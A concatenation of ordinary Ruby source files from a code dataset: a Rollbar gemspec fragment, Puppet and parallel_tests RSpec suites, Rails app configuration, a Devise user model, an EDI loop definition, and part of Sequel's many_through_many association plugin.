_is_jruby = defined?(JRUBY_VERSION) || (defined?(RUBY_ENGINE) && RUBY_ENGINE == 'jruby')
gem.authors = ['Rollbar, Inc.']
gem.email = ['[email protected]']
gem.description = 'Easy and powerful exception tracking for Ruby'
gem.executables = ['rollbar-rails-runner']
gem.summary = 'Reports exceptions to Rollbar'
gem.homepage = 'https://rollbar.com'
gem.license = 'MIT'
gem.files = `git ls-files -z`.split("\x0").reject { |f| f.match(%r{^(test|spec|features)/}) }
gem.files += ['spec/support/rollbar_api.rb'] # useful helper for app spec/tests.
gem.name = 'rollbar'
gem.require_paths = ['lib']
gem.required_ruby_version = '>= 2.0.0'
gem.version = Rollbar::VERSION
if gem.respond_to?(:metadata)
gem.metadata['changelog_uri'] = 'https://github.com/rollbar/rollbar-gem/releases'
gem.metadata['source_code_uri'] = 'https://github.com/rollbar/rollbar-gem'
gem.metadata['bug_tracker_uri'] = 'https://github.com/rollbar/rollbar-gem/issues'
gem.metadata['homepage_uri'] = 'https://rollbar.com/'
gem.metadata['documentation_uri'] = 'https://docs.rollbar.com/docs/ruby'
end
end
| 43.366667 | 103 | 0.657187 |
283201ba95d6dfea6ad46e352836847c86a53ff0 | 6,729 | require 'spec_helper'
describe 'datadog_agent::integrations::elasticsearch' do
ALL_SUPPORTED_AGENTS.each do |agent_major_version|
context 'supported agents' do
let(:pre_condition) { "class {'::datadog_agent': agent_major_version => #{agent_major_version}}" }
conf_file = if agent_major_version == 5
'/etc/dd-agent/conf.d/elastic.yaml'
else
"#{CONF_DIR}/elastic.d/conf.yaml"
end
it { is_expected.to compile.with_all_deps }
it {
is_expected.to contain_file(conf_file).with(
owner: DD_USER,
group: DD_GROUP,
mode: PERMISSIONS_FILE,
)
}
it { is_expected.to contain_file(conf_file).that_requires("Package[#{PACKAGE_NAME}]") }
it { is_expected.to contain_file(conf_file).that_notifies("Service[#{SERVICE_NAME}]") }
context 'with default parameters' do
it { is_expected.to contain_file(conf_file).with_content(%r{ - url: http://localhost:9200}) }
it { is_expected.to contain_file(conf_file).with_content(%r{ cluster_stats: false}) }
it { is_expected.to contain_file(conf_file).with_content(%r{ index_stats: false}) }
it { is_expected.to contain_file(conf_file).with_content(%r{ pending_task_stats: true}) }
it { is_expected.to contain_file(conf_file).with_content(%r{ pshard_stats: false}) }
it { is_expected.not_to contain_file(conf_file).with_content(%r{ username}) }
it { is_expected.not_to contain_file(conf_file).with_content(%r{ password}) }
it { is_expected.not_to contain_file(conf_file).with_content(%r{ ssl_verify}) }
it { is_expected.not_to contain_file(conf_file).with_content(%r{ ssl_cert}) }
it { is_expected.not_to contain_file(conf_file).with_content(%r{ ssl_key}) }
it { is_expected.not_to contain_file(conf_file).with_content(%r{ tags:}) }
end
context 'with parameters set' do
let(:params) do
{
password: 'password',
pending_task_stats: false,
url: 'https://foo:4242',
username: 'username',
ssl_cert: '/etc/ssl/certs/client.pem',
ssl_key: '/etc/ssl/private/client.key',
tags: ['tag1:key1'],
}
end
it { is_expected.to contain_file(conf_file).with_content(%r{ - url: https://foo:4242}) }
it { is_expected.to contain_file(conf_file).with_content(%r{ pending_task_stats: false}) }
it { is_expected.to contain_file(conf_file).with_content(%r{ username: username}) }
it { is_expected.to contain_file(conf_file).with_content(%r{ password: password}) }
it { is_expected.to contain_file(conf_file).with_content(%r{ ssl_verify: true}) }
it { is_expected.to contain_file(conf_file).with_content(%r{ ssl_cert: /etc/ssl/certs/client.pem}) }
it { is_expected.to contain_file(conf_file).with_content(%r{ ssl_key: /etc/ssl/private/client.key}) }
it { is_expected.to contain_file(conf_file).with_content(%r{ tags:}) }
it { is_expected.to contain_file(conf_file).with_content(%r{ - tag1:key1}) }
end
context 'with multiple instances set' do
let(:params) do
{
instances: [
{
'cluster_stats' => true,
'index_stats' => false,
'password' => 'password',
'pending_task_stats' => false,
'pshard_stats' => true,
'url' => 'https://foo:4242',
'username' => 'username',
'ssl_verify' => true,
'ssl_cert' => '/etc/ssl/certs/client.pem',
'ssl_key' => '/etc/ssl/private/client.key',
'tags' => ['tag1:key1'],
},
{
'cluster_stats' => false,
'index_stats' => true,
'password' => 'password_2',
'pending_task_stats' => true,
'pshard_stats' => false,
'url' => 'https://bar:2424',
'username' => 'username_2',
'ssl_verify' => false,
'tags' => ['tag2:key2'],
},
],
}
end
it { is_expected.to contain_file(conf_file).with_content(%r{instances:}) }
it { is_expected.to contain_file(conf_file).with_content(%r{ - url: https://foo:4242}) }
it { is_expected.to contain_file(conf_file).with_content(%r{ cluster_stats: true}) }
it { is_expected.to contain_file(conf_file).with_content(%r{ index_stats: false}) }
it { is_expected.to contain_file(conf_file).with_content(%r{ pending_task_stats: false}) }
it { is_expected.to contain_file(conf_file).with_content(%r{ username: username}) }
it { is_expected.to contain_file(conf_file).with_content(%r{ password: password}) }
it { is_expected.to contain_file(conf_file).with_content(%r{ pshard_stats: true}) }
it { is_expected.to contain_file(conf_file).with_content(%r{ ssl_verify: true}) }
it { is_expected.to contain_file(conf_file).with_content(%r{ ssl_cert: /etc/ssl/certs/client.pem}) }
it { is_expected.to contain_file(conf_file).with_content(%r{ ssl_key: /etc/ssl/private/client.key}) }
it { is_expected.to contain_file(conf_file).with_content(%r{ tags:\n - tag1:key1}) }
it { is_expected.to contain_file(conf_file).with_content(%r{ - url: https://bar:2424}) }
it { is_expected.to contain_file(conf_file).with_content(%r{ cluster_stats: false}) }
it { is_expected.to contain_file(conf_file).with_content(%r{ index_stats: true}) }
it { is_expected.to contain_file(conf_file).with_content(%r{ pending_task_stats: true}) }
it { is_expected.to contain_file(conf_file).with_content(%r{ username: username_2}) }
it { is_expected.to contain_file(conf_file).with_content(%r{ password: password_2}) }
it { is_expected.to contain_file(conf_file).with_content(%r{ pshard_stats: false}) }
it { is_expected.to contain_file(conf_file).with_content(%r{ ssl_verify: false}) }
it { is_expected.to contain_file(conf_file).with_content(%r{ tags:\n - tag2:key2}) }
end
end
end
end
| 55.61157 | 114 | 0.575568 |
acf46839e32bcb5a06f86f4e42e4c43b35222f18 | 2,588 | require File.expand_path('../boot', __FILE__)
require 'rails/all'
Bundler.require
require "help_tips"
module Dummy
class Application < Rails::Application
# Settings in config/environments/* take precedence over those specified here.
# Application configuration should go into files in config/initializers
# -- all .rb files in that directory are automatically loaded.
# Custom directories with classes and modules you want to be autoloadable.
# config.autoload_paths += %W(#{config.root}/extras)
# Only load the plugins named here, in the order given (default is alphabetical).
# :all can be used as a placeholder for all plugins not explicitly named.
# config.plugins = [ :exception_notification, :ssl_requirement, :all ]
# Activate observers that should always be running.
# config.active_record.observers = :cacher, :garbage_collector, :forum_observer
# Set Time.zone default to the specified zone and make Active Record auto-convert to this zone.
# Run "rake -D time" for a list of tasks for finding time zone names. Default is UTC.
# config.time_zone = 'Central Time (US & Canada)'
# The default locale is :en and all translations from config/locales/*.rb,yml are auto loaded.
# config.i18n.load_path += Dir[Rails.root.join('my', 'locales', '*.{rb,yml}').to_s]
# config.i18n.default_locale = :de
# Configure the default encoding used in templates for Ruby 1.9.
config.encoding = "utf-8"
# Configure sensitive parameters which will be filtered from the log file.
config.filter_parameters += [:password]
# Enable escaping HTML in JSON.
config.active_support.escape_html_entities_in_json = true
# Use SQL instead of Active Record's schema dumper when creating the database.
# This is necessary if your schema can't be completely dumped by the schema dumper,
# like if you have constraints or database-specific column types
# config.active_record.schema_format = :sql
# Enforce whitelist mode for mass assignment.
# This will create an empty whitelist of attributes available for mass-assignment for all models
# in your app. As such, your models will need to explicitly whitelist or blacklist accessible
# parameters by using an attr_accessible or attr_protected declaration.
config.active_record.whitelist_attributes = true if Rails::VERSION::MAJOR <= 4
# Enable the asset pipeline
config.assets.enabled = true
# Version of your assets, change this if you want to expire all your assets
config.assets.version = '1.0'
end
end
| 43.133333 | 100 | 0.732998 |
ab7affca9052a4ad8b2b25a15b10a8066d21c747 | 14,876 | #encoding: utf-8
require 'spec_helper'
describe 'CLI' do
before do
`rm -rf #{folder}`
end
after do
`rm -rf #{folder}`
end
def folder
"/tmp/parallel_tests_tests"
end
def write(file, content)
path = "#{folder}/#{file}"
ensure_folder File.dirname(path)
File.open(path, 'w'){|f| f.write content }
path
end
def read(file)
File.read "#{folder}/#{file}"
end
def bin_folder
"#{File.expand_path(File.dirname(__FILE__))}/../bin"
end
def executable(options={})
"#{bin_folder}/parallel_#{options[:type] || 'test'}"
end
def ensure_folder(folder)
`mkdir -p #{folder}` unless File.exist?(folder)
end
def run_tests(test_folder, options={})
ensure_folder folder
processes = "-n #{options[:processes]||2}" unless options[:processes] == false
command = "cd #{folder} && #{options[:export]} #{executable(options)} #{test_folder} #{processes} #{options[:add]} 2>&1"
result = `#{command}`
raise "FAILED #{command}\n#{result}" if $?.success? == !!options[:fail]
result
end
it "runs tests in parallel" do
write 'spec/xxx_spec.rb', 'describe("it"){it("should"){puts "TEST1"}}'
write 'spec/xxx2_spec.rb', 'describe("it"){it("should"){puts "TEST2"}}'
result = run_tests "spec", :type => 'rspec'
# test ran and gave their puts
result.should include('TEST1')
result.should include('TEST2')
# all results present
result.scan('1 example, 0 failure').size.should == 2 # 2 results
result.scan('2 examples, 0 failures').size.should == 1 # 1 summary
result.scan(/Finished in \d+\.\d+ seconds/).size.should == 2
result.scan(/Took \d+\.\d+ seconds/).size.should == 1 # parallel summary
end
it "runs tests which outputs accented characters" do
write "spec/xxx_spec.rb", "#encoding: utf-8\ndescribe('it'){it('should'){puts 'Byłem tu'}}"
result = run_tests "spec", :type => 'rspec'
# test ran and gave their puts
result.should include('Byłem tu')
end
it "does not run any tests if there are none" do
write 'spec/xxx_spec.rb', '1'
result = run_tests "spec", :type => 'rspec'
result.should include('No examples found')
result.should include('Took')
end
it "fails when tests fail" do
write 'spec/xxx_spec.rb', 'describe("it"){it("should"){puts "TEST1"}}'
write 'spec/xxx2_spec.rb', 'describe("it"){it("should"){1.should == 2}}'
result = run_tests "spec", :fail => true, :type => 'rspec'
result.scan('1 example, 1 failure').size.should == 1
result.scan('1 example, 0 failure').size.should == 1
result.scan('2 examples, 1 failure').size.should == 1
end
it "can serialize stdout" do
write 'spec/xxx_spec.rb', '5.times{describe("it"){it("should"){sleep 0.01; puts "TEST1"}}}'
write 'spec/xxx2_spec.rb', 'sleep 0.01; 5.times{describe("it"){it("should"){sleep 0.01; puts "TEST2"}}}'
result = run_tests "spec", :type => 'rspec', :add => "--serialize-stdout"
result.should_not =~ /TEST1.*TEST2.*TEST1/m
result.should_not =~ /TEST2.*TEST1.*TEST2/m
end
context "with given commands" do
it "can exec given commands with ENV['TEST_ENV_NUM']" do
result = `#{executable} -e 'ruby -e "print ENV[:TEST_ENV_NUMBER.to_s].to_i"' -n 4`
result.gsub('"','').split('').sort.should == %w[0 2 3 4]
end
it "can exec given command non-parallel" do
result = `#{executable} -e 'ruby -e "sleep(rand(10)/100.0); puts ENV[:TEST_ENV_NUMBER.to_s].inspect"' -n 4 --non-parallel`
result.split("\n").should == %w["" "2" "3" "4"]
end
it "can serialize stdout" do
result = `#{executable} -e 'ruby -e "5.times{sleep 0.01;puts ENV[:TEST_ENV_NUMBER.to_s].to_i;STDOUT.flush}"' -n 2 --serialize-stdout`
result.should_not =~ /0.*2.*0/m
result.should_not =~ /2.*0.*2/m
end
it "exists with success if all sub-processes returned success" do
system("#{executable} -e 'cat /dev/null' -n 4").should == true
end
it "exists with failure if any sub-processes returned failure" do
system("#{executable} -e 'test -e xxxx' -n 4").should == false
end
end
it "runs through parallel_rspec" do
version = `#{executable} -v`
`#{bin_folder}/parallel_rspec -v`.should == version
end
it "runs through parallel_cucumber" do
version = `#{executable} -v`
`#{bin_folder}/parallel_cucumber -v`.should == version
end
it "runs through parallel_spinach" do
version = `#{executable} -v`
`#{bin_folder}/parallel_spinach -v`.should == version
end
it "runs with --group-by found" do
# it only tests that it does not blow up, as it did before fixing...
write "spec/x1_spec.rb", "puts '111'"
run_tests "spec", :type => 'rspec', :add => '--group-by found'
end
it "runs faster with more processes" do
pending if RUBY_PLATFORM == "java" # just too slow ...
2.times{|i|
write "spec/xxx#{i}_spec.rb", 'describe("it"){it("should"){sleep 5}}; $stderr.puts ENV["TEST_ENV_NUMBER"]'
}
t = Time.now
run_tests("spec", :processes => 2, :type => 'rspec')
expected = 10
(Time.now - t).should <= expected
end
it "can run with given files" do
write "spec/x1_spec.rb", "puts '111'"
write "spec/x2_spec.rb", "puts '222'"
write "spec/x3_spec.rb", "puts '333'"
result = run_tests "spec/x1_spec.rb spec/x3_spec.rb", :type => 'rspec'
result.should include('111')
result.should include('333')
result.should_not include('222')
end
it "runs successfully without any files" do
results = run_tests "", :type => 'rspec'
results.should include("2 processes for 0 specs")
results.should include("Took")
end
it "can run with test-options" do
write "spec/x1_spec.rb", "111"
write "spec/x2_spec.rb", "111"
result = run_tests "spec",
:add => "--test-options ' --version'",
:processes => 2,
:type => 'rspec'
result.should =~ /\d+\.\d+\.\d+.*\d+\.\d+\.\d+/m # prints version twice
end
it "runs with PARALLEL_TEST_PROCESSORS processes" do
processes = 5
processes.times{|i|
write "spec/x#{i}_spec.rb", "puts %{ENV-\#{ENV['TEST_ENV_NUMBER']}-}"
}
result = run_tests "spec",
:export => "PARALLEL_TEST_PROCESSORS=#{processes}",
:processes => processes,
:type => 'rspec'
result.scan(/ENV-.?-/).should =~ ["ENV--", "ENV-2-", "ENV-3-", "ENV-4-", "ENV-5-"]
end
it "filters test by given pattern and relative paths" do
write "spec/x_spec.rb", "puts 'XXX'"
write "spec/y_spec.rb", "puts 'YYY'"
write "spec/z_spec.rb", "puts 'ZZZ'"
result = run_tests "spec", :add => "-p '^spec/(x|z)'", :type => "rspec"
result.should include('XXX')
result.should_not include('YYY')
result.should include('ZZZ')
end
it "can wait_for_other_processes_to_finish" do
pending if RUBY_PLATFORM == "java" # just too slow ...
write "test/a_test.rb", "require 'parallel_tests'; sleep 0.5 ; ParallelTests.wait_for_other_processes_to_finish; puts 'a'"
write "test/b_test.rb", "sleep 1; puts 'b'"
write "test/c_test.rb", "sleep 1.5; puts 'c'"
write "test/d_test.rb", "sleep 2; puts 'd'"
run_tests("test", :processes => 4).should include("b\nc\nd\na\n")
end
context "Test::Unit" do
it "runs" do
write "test/x1_test.rb", "require 'test/unit'; class XTest < Test::Unit::TestCase; def test_xxx; end; end"
result = run_tests("test")
result.should include('1 test')
end
it "passes test options" do
write "test/x1_test.rb", "require 'test/unit'; class XTest < Test::Unit::TestCase; def test_xxx; end; end"
result = run_tests("test", :add => '--test-options "-v"')
result.should include('test_xxx') # verbose output of every test
end
it "runs successfully without any files" do
results = run_tests("")
results.should include("2 processes for 0 tests")
results.should include("Took")
end
end
context "Cucumber" do
before do
write "features/steps/a.rb", "
Given('I print TEST_ENV_NUMBER'){ puts \"YOUR TEST ENV IS \#{ENV['TEST_ENV_NUMBER']}!\" }
And('I sleep a bit'){ sleep 0.2 }
And('I pass'){ true }
And('I fail'){ fail }
"
end
it "runs tests which outputs accented characters" do
write "features/good1.feature", "Feature: xxx\n Scenario: xxx\n Given I print accented characters"
write "features/steps/a.rb", "#encoding: utf-8\nGiven('I print accented characters'){ puts \"I tu też\" }"
result = run_tests "features", :type => "cucumber", :add => '--pattern good'
result.should include('I tu też')
end
it "passes TEST_ENV_NUMBER when running with pattern (issue #86)" do
write "features/good1.feature", "Feature: xxx\n Scenario: xxx\n Given I print TEST_ENV_NUMBER"
write "features/good2.feature", "Feature: xxx\n Scenario: xxx\n Given I print TEST_ENV_NUMBER"
write "features/b.feature", "Feature: xxx\n Scenario: xxx\n Given I FAIL"
write "features/steps/a.rb", "Given('I print TEST_ENV_NUMBER'){ puts \"YOUR TEST ENV IS \#{ENV['TEST_ENV_NUMBER']}!\" }"
result = run_tests "features", :type => "cucumber", :add => '--pattern good'
result.should include('YOUR TEST ENV IS 2!')
result.should include('YOUR TEST ENV IS !')
result.should_not include('I FAIL')
end
it "writes a runtime log" do
log = "tmp/parallel_runtime_cucumber.log"
write(log, "x")
2.times{|i|
# needs sleep so that runtime loggers dont overwrite each other initially
write "features/good#{i}.feature", "Feature: xxx\n Scenario: xxx\n Given I print TEST_ENV_NUMBER\n And I sleep a bit"
}
run_tests "features", :type => "cucumber"
read(log).gsub(/\.\d+/,'').split("\n").should =~ [
"features/good0.feature:0",
"features/good1.feature:0"
]
end
it "runs each feature once when there are more processes then features (issue #89)" do
2.times{|i|
write "features/good#{i}.feature", "Feature: xxx\n Scenario: xxx\n Given I print TEST_ENV_NUMBER"
}
result = run_tests "features", :type => "cucumber", :add => '-n 3'
result.scan(/YOUR TEST ENV IS \d?!/).sort.should == ["YOUR TEST ENV IS !", "YOUR TEST ENV IS 2!"]
end
it "runs successfully without any files" do
results = run_tests("", :type => "cucumber")
results.should include("2 processes for 0 features")
results.should include("Took")
end
it "collates failing scenarios" do
write "features/pass.feature", "Feature: xxx\n Scenario: xxx\n Given I pass"
write "features/fail1.feature", "Feature: xxx\n Scenario: xxx\n Given I fail"
write "features/fail2.feature", "Feature: xxx\n Scenario: xxx\n Given I fail"
results = run_tests "features", :processes => 3, :type => "cucumber", :fail => true
results.should include """
Failing Scenarios:
cucumber features/fail2.feature:2 # Scenario: xxx
cucumber features/fail1.feature:2 # Scenario: xxx
3 scenarios (2 failed, 1 passed)
3 steps (2 failed, 1 passed)
"""
end
it "groups by scenario" do
write "features/long.feature", <<-EOS
Feature: xxx
Scenario: xxx
Given I print TEST_ENV_NUMBER
Scenario: xxx
Given I print TEST_ENV_NUMBER
Scenario Outline: xxx
Given I print TEST_ENV_NUMBER
Examples:
| num |
| one |
| two |
EOS
result = run_tests "features", :type => "cucumber", :add => "--group-by scenarios"
result.should include("2 processes for 4 scenarios")
end
it "groups by step" do
write "features/good1.feature", "Feature: xxx\n Scenario: xxx\n Given I print TEST_ENV_NUMBER"
write "features/good2.feature", "Feature: xxx\n Scenario: xxx\n Given I print TEST_ENV_NUMBER"
result = run_tests "features", :type => "cucumber", :add => '--group-by steps'
result.should include("2 processes for 2 features")
end
end
context "Spinach", :fails_on_ruby_187 => true do
before do
write "features/steps/a.rb", "class A < Spinach::FeatureSteps\n Given 'I print TEST_ENV_NUMBER' do\n puts \"YOUR TEST ENV IS \#{ENV['TEST_ENV_NUMBER']}!\"\n end\n And 'I sleep a bit' do\n sleep 0.2\n end\nend"
end
it "runs tests which outputs accented characters" do
write "features/good1.feature", "Feature: a\n Scenario: xxx\n Given I print accented characters"
write "features/steps/a.rb", "#encoding: utf-8\nclass A < Spinach::FeatureSteps\nGiven 'I print accented characters' do\n puts \"I tu też\" \n end\nend"
result = run_tests "features", :type => "spinach", :add => 'features/good1.feature'#, :add => '--pattern good'
result.should include('I tu też')
end
it "passes TEST_ENV_NUMBER when running with pattern (issue #86)" do
write "features/good1.feature", "Feature: a\n Scenario: xxx\n Given I print TEST_ENV_NUMBER"
write "features/good2.feature", "Feature: a\n Scenario: xxx\n Given I print TEST_ENV_NUMBER"
write "features/b.feature", "Feature: b\n Scenario: xxx\n Given I FAIL" #Expect this not to be run
write "features/steps/a.rb", "class A < Spinach::FeatureSteps\nGiven('I print TEST_ENV_NUMBER'){ puts \"YOUR TEST ENV IS \#{ENV['TEST_ENV_NUMBER']}!\" }\nend"
result = run_tests "features", :type => "spinach", :add => '--pattern good'
result.should include('YOUR TEST ENV IS 2!')
result.should include('YOUR TEST ENV IS !')
result.should_not include('I FAIL')
end
it "writes a runtime log" do
pending 'not yet implemented -- custom runtime logging'
log = "tmp/parallel_runtime_spinach.log"
write(log, "x")
2.times{|i|
# needs sleep so that runtime loggers don't overwrite each other initially
write "features/good#{i}.feature", "Feature: A\n Scenario: xxx\n Given I print TEST_ENV_NUMBER\n And I sleep a bit"
}
result = run_tests "features", :type => "spinach"
read(log).gsub(/\.\d+/,'').split("\n").should =~ [
"features/good0.feature:0",
"features/good1.feature:0"
]
end
it "runs each feature once when there are more processes then features (issue #89)" do
2.times{|i|
write "features/good#{i}.feature", "Feature: A\n Scenario: xxx\n Given I print TEST_ENV_NUMBER\n"
}
result = run_tests "features", :type => "spinach", :add => '-n 3'
result.scan(/YOUR TEST ENV IS \d?!/).sort.should == ["YOUR TEST ENV IS !", "YOUR TEST ENV IS 2!"]
end
it "runs successfully without any files" do
results = run_tests("", :type => "spinach")
results.should include("2 processes for 0 features")
results.should include("Took")
end
end
end
| 37.660759 | 225 | 0.627857 |
4a78b890ec7dc4d233bc80a45dc7646106220835 | 85 | require_relative "../support/job_buffer"
class ApplicationJob < ActiveJob::Base
end
| 17 | 40 | 0.8 |
010bc2f51de28424a71936471f611967d2a47ae1 | 1,019 | module Hippo_eyeDoc::TransactionSets
module HIPAA_276
class L2000B < Hippo_eyeDoc::TransactionSets::Base
loop_name 'L2000B' #Information Receiver Level
#Information Receiver Level
segment Hippo_eyeDoc::Segments::HL,
:name => 'Information Receiver Level',
:minimum => 1,
:maximum => 1,
:position => 100,
:identified_by => {
'HL03' => '21',
'HL04' => '1'
}
#Information Receiver Name
loop Hippo_eyeDoc::TransactionSets::HIPAA_276::L2100B,
:name => 'Information Receiver Name',
:minimum => 1,
:maximum => 1,
:position => 500,
:identified_by => {
'NM1.NM101' => '41',
'NM1.NM102' => ["1", "2"],
'NM1.NM108' => '46'
}
end
end
end
| 30.878788 | 64 | 0.42787 |
012762200dbfb477e44d1ff7b0bfb87a25b65f8c | 2,638 | class User < ApplicationRecord
include SimpleDiscussion::ForumUser
# Include default devise modules. Others available are:
# and :omniauthable
devise :invitable, :database_authenticatable, :registerable,
:recoverable, :rememberable, :validatable,
:confirmable, :lockable, :timeoutable, :trackable
attr_accessor :canonical_subdomain
before_destroy :ensure_final_user
PRIVATE_ATTRIBUTES = [
:encrypted_password,
:reset_password_token,
:reset_password_sent_at,
:remember_created_at,
:sign_in_count,
:current_sign_in_at,
:last_sign_in_at,
:current_sign_in_ip,
:last_sign_in_ip,
:confirmation_token,
:confirmed_at,
:confirmation_sent_at,
:unconfirmed_email,
:failed_attempts,
:unlock_token,
:locked_at,
:invitation_token,
:invitation_created_at,
:invitation_sent_at,
:invitation_accepted_at,
:invitation_limit ,
:invited_by_type,
:invited_by_id,
:invitations_count
]
FULL_PERMISSIONS = {
can_access_admin: true,
can_manage_web: true,
can_manage_analytics: true,
can_manage_email: true,
can_manage_users: true,
can_manage_blog: true,
can_manage_api: true,
can_manage_subdomain_settings: true,
can_view_restricted_pages: true,
moderator: true
}
SESSION_TIMEOUT = [
{
label: '1 hour',
exec: '1.hour',
slug: '1-hour'
},
{
label: '3 hours',
exec: '3.hours',
slug: '3-hour'
},
{
label: '6 hours',
exec: '6.hours',
slug: '6-hour'
},
{
label: '1 day',
exec: '1.day',
slug: '1-day'
},
{
label: '1 week',
exec: '1.week',
slug: '1-week'
}
]
validates :session_timeoutable_in, inclusion: { in: User::SESSION_TIMEOUT.map{ |n| n[:slug] } }
has_one_attached :avatar
# to run User.find(123).visits
has_many :visits, class_name: "Ahoy::Visit"
def subdomain
Apartment::Tenant.current
end
def self.global_admins
self.where(global_admin: true)
end
def self.forum_mods
self.where(moderator: true)
end
def previous_ahoy_visits
Ahoy::Visit.where(user_id: self.id).order(started_at: :desc).limit(5)
end
def self.public_attributes
attribute_names - PRIVATE_ATTRIBUTES.map(&:to_s)
end
def timeout_in
timeout = User::SESSION_TIMEOUT.detect{|n| n[:slug] == self.session_timeoutable_in }[:exec]
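# The :exec strings come from the fixed SESSION_TIMEOUT constant above,
# so this eval only ever sees literals like '1.hour'.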
eval(timeout)
end
private
def ensure_final_user
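# Prevent destroying the last remaining user.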
if Rails.env != 'test'
if User.all.size - 1 == 0
throw :abort
end
end
end
end
| 20.936508 | 97 | 0.651251 |
91d620a91221baa7a39dac85eddb7e762077e083 | 87 | num = 987_298
if num.even?
puts 'The number is even'
else
puts 'The number is odd'
end
| 10.875 | 25 | 0.666667 |
877a095f72780fa1eee41fae2452990c52c50c51 | 21,240 | # frozen-string-literal: true
module Sequel
module Plugins
# The many_through_many plugin allow you to create an association using multiple join tables.
# For example, assume the following associations:
#
# Artist.many_to_many :albums
# Album.many_to_many :tags
#
# The many_through_many plugin would allow this:
#
# Artist.plugin :many_through_many
# Artist.many_through_many :tags, [[:albums_artists, :artist_id, :album_id], [:albums_tags, :album_id, :tag_id]]
#
# Which will give you the tags for all of the artist's albums.
#
# Let's break down the 2nd argument of the many_through_many call:
#
# [[:albums_artists, :artist_id, :album_id],
# [:albums_tags, :album_id, :tag_id]]
#
# This argument is an array of arrays with three elements. Each entry in the main array represents a JOIN in SQL:
#
# first element :: represents the name of the table to join.
# second element :: represents the column used to join to the previous table.
# third element :: represents the column used to join to the next table.
#
# So the "Artist.many_through_many :tags" is translated into something similar to:
#
# FROM artists
# JOIN albums_artists ON (artists.id = albums_artists.artist_id)
# JOIN albums_tags ON (albums_artists.album_id = albums_tag.album_id)
# JOIN tags ON (albums_tags.tag_id = tags.id)
#
# The "artists.id" and "tags.id" criteria come from other association options (defaulting to the primary keys of the current and
# associated tables), but hopefully you can see how each argument in the array is used in the JOIN clauses. Note that you do
# not need to add an entry for the final table (tags in this example), as that comes from the associated class.
#
# Here are some more examples:
#
# # Same as Artist.many_to_many :albums
# Artist.many_through_many :albums, [[:albums_artists, :artist_id, :album_id]]
#
# # All artists that are associated to any album that this artist is associated to
# Artist.many_through_many :artists, [[:albums_artists, :artist_id, :album_id], [:albums_artists, :album_id, :artist_id]]
#
# # All albums by artists that are associated to any album that this artist is associated to
# Artist.many_through_many :artist_albums, [[:albums_artists, :artist_id, :album_id],
# [:albums_artists, :album_id, :artist_id], [:albums_artists, :artist_id, :album_id]],
# class: :Album
#
# # All tracks on albums by this artist (also could be a many_to_many)
# Artist.many_through_many :tracks, [[:albums_artists, :artist_id, :album_id]],
# right_primary_key: :album_id
#
# Often you don't want the current object to appear in the array of associated objects. This is easiest to handle via an :after_load hook:
#
# Artist.many_through_many :artists, [[:albums_artists, :artist_id, :album_id], [:albums_artists, :album_id, :artist_id]],
# after_load: lambda{|artist, associated_artists| associated_artists.delete(artist)}
#
# You can also handle it by adding a dataset block that excludes the current record (so it won't be retrieved at all), but
# that won't work when eagerly loading, which is why the :after_load proc is recommended instead.
#
# It's also common to not want duplicate records, in which case the :distinct option can be used:
#
# Artist.many_through_many :artists, [[:albums_artists, :artist_id, :album_id], [:albums, :id, :id], [:albums_artists, :album_id, :artist_id]],
# distinct: true
#
# In addition to many_through_many, this plugin also adds one_through_many, for an association to a single object through multiple join tables.
# This is useful if there are unique constraints on the foreign keys in the join tables that reference back to the current table, or if you want
# to set an order on the association and just want the first record.
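# For example, to get a single tag through the same join tables (a
# hypothetical association; any ordering column works):
#
#   Artist.one_through_many :first_tag, [[:albums_artists, :artist_id, :album_id], [:albums_tags, :album_id, :tag_id]],
#     class: :Tag, order: :name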
#
# Usage:
#
# # Make all model subclasses support many_through_many associations
# Sequel::Model.plugin :many_through_many
#
# # Make the Album class support many_through_many associations
# Album.plugin :many_through_many
module ManyThroughMany
# The AssociationReflection subclass for many_through_many associations.
class ManyThroughManyAssociationReflection < Sequel::Model::Associations::ManyToManyAssociationReflection
Sequel.synchronize{Sequel::Model::Associations::ASSOCIATION_TYPES[:many_through_many] = self}
# many_through_many and one_through_many associations can be clones
def cloneable?(ref)
ref[:type] == :many_through_many || ref[:type] == :one_through_many
end
# The default associated key alias(es) to use when eager loading
# associations via eager.
def default_associated_key_alias
self[:uses_left_composite_keys] ? (0...self[:through].first[:left].length).map{|i| :"x_foreign_key_#{i}_x"} : :x_foreign_key_x
end
%w'associated_key_table predicate_key edges final_edge final_reverse_edge reverse_edges'.each do |meth|
class_eval(<<-END, __FILE__, __LINE__+1)
def #{meth}
cached_fetch(:#{meth}){calculate_edges[:#{meth}]}
end
END
end
FINALIZE_SETTINGS = superclass::FINALIZE_SETTINGS.merge(
:associated_key_table=>:associated_key_table,
:edges=>:edges,
:final_edge=>:final_edge,
:final_reverse_edge=>:final_reverse_edge,
:reverse_edges=>:reverse_edges
).freeze
def finalize_settings
FINALIZE_SETTINGS
end
# The alias for the first join table.
def join_table_alias
final_reverse_edge[:alias]
end
# Many through many associations don't have a reciprocal
def reciprocal
nil
end
# Whether a separate query should be used for each join table.
def separate_query_per_table?
self[:separate_query_per_table]
end
private
def _associated_dataset
ds = associated_class
if separate_query_per_table?
ds = ds.dataset
else
(reverse_edges + [final_reverse_edge]).each do |t|
h = {:qualify=>:deep}
if t[:alias] != t[:table]
h[:table_alias] = t[:alias]
end
ds = ds.join(t[:table], Array(t[:left]).zip(Array(t[:right])), h)
end
end
ds
end
# Make sure to use unique table aliases when lazy loading or eager loading
def calculate_reverse_edge_aliases(reverse_edges)
aliases = [associated_class.table_name]
reverse_edges.each do |e|
table_alias = e[:table]
if aliases.include?(table_alias)
i = 0
table_alias = while true
ta = :"#{table_alias}_#{i}"
break ta unless aliases.include?(ta)
i += 1
end
end
aliases.push(e[:alias] = table_alias)
end
end
# Transform the :through option into a list of edges and reverse edges to use to join tables when loading the association.
def calculate_edges
es = [{:left_table=>self[:model].table_name, :left_key=>self[:left_primary_key_column]}]
self[:through].each do |t|
es.last.merge!(:right_key=>t[:left], :right_table=>t[:table], :join_type=>t[:join_type]||self[:graph_join_type], :conditions=>(t[:conditions]||[]).to_a, :block=>t[:block])
es.last[:only_conditions] = t[:only_conditions] if t.include?(:only_conditions)
es << {:left_table=>t[:table], :left_key=>t[:right]}
end
es.last.merge!(:right_key=>right_primary_key, :right_table=>associated_class.table_name)
edges = es.map do |e|
h = {:table=>e[:right_table], :left=>e[:left_key], :right=>e[:right_key], :conditions=>e[:conditions], :join_type=>e[:join_type], :block=>e[:block]}
h[:only_conditions] = e[:only_conditions] if e.include?(:only_conditions)
h
end
